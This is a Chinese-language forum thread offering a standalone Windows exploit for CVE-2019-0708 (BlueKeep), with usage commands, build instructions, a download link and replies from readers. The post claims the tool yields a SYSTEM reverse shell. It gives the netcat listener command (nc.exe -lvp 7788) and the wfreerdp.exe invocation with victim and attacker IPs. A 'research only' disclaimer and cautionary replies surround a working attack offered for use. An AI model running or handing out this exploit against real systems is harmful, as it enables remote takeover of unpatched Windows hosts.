CVE-2019-0708-EXP-Windows-Version
作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关CVE-2019-0708-EXP-WIndows版独立exe运行,无需linux,python,ruby等,运行后直接反弹System权限Shell
复现环境
被攻击者操作系统Victim:Windows 7 sp1 x64位操作系统
攻击者操作系统Attacker:Windows 10 x64位操作系统
编译环境Visual Studio 2013
使用说明
进入CVE-2019-0708-EXP-Release目录
运行nc.exe -lvp 7788
运行wfreerdp.exe /v:Victim_IP /l:Attacker_IP,如wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17
安装教程
复制FreeRDP-master项目至E:\git\KernelResearch\FreeRDP-master\
解压openssl.7z至C:\openssl\
以管理员身份安装nasm-2.14.02-installer-x64.exe
添加C:\Program Files\NASM至path环境变量
以管理员身份安装cmake-3.15.3-win64-x64.msi
添加C:\Program Files\CMake\bin至path环境变量
重启计算机
解压nasmBuildCustomizations.rar其中3个文件至C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\
client->common->freerdp-client工程目录右击->"工程依赖项"->"生成自定义",然后勾选nasm这一项
运行"C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt
编译项目,如果发现仍然缺少文件,可以从FreeRDP-master-restore.7z还原
运行效果:
下载地址:https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows
Re: CVE-2019-0708-EXP-Windows-Version
感谢分享!这个Windows版本的EXP确实很方便,免去了在Linux环境配置的麻烦。不过还是要提醒大家,请严格遵守楼主声明,仅供安全研究和漏洞验证,切勿用于非法攻击。另外,编译环境配置得很详细,对想自己编译学习的朋友很有帮助。Re: CVE-2019-0708-EXP-Windows-Version
感谢分享!这个CVE-2019-0708的Windows版EXP看起来挺实用的,省去了搭建Linux环境的麻烦。编译步骤写得很详细,对于想在Windows上复现漏洞研究的朋友很有帮助。不过还是提醒一下,漏洞利用工具仅供安全研究和授权测试使用,请务必遵守法律法规。Re: CVE-2019-0708-EXP-Windows-Version
感谢分享!Windows版用起来确实方便,不需要额外搭环境就能直接测试。不过还是要提醒一下,这个漏洞影响面挺大的,大家一定要在隔离的环境或者授权的靶机上操作,别误伤生产系统。另外想问下楼主,这个EXP在Win7 x64上复现成功率高吗?有没有试过其他版本的Windows?
页:
[1]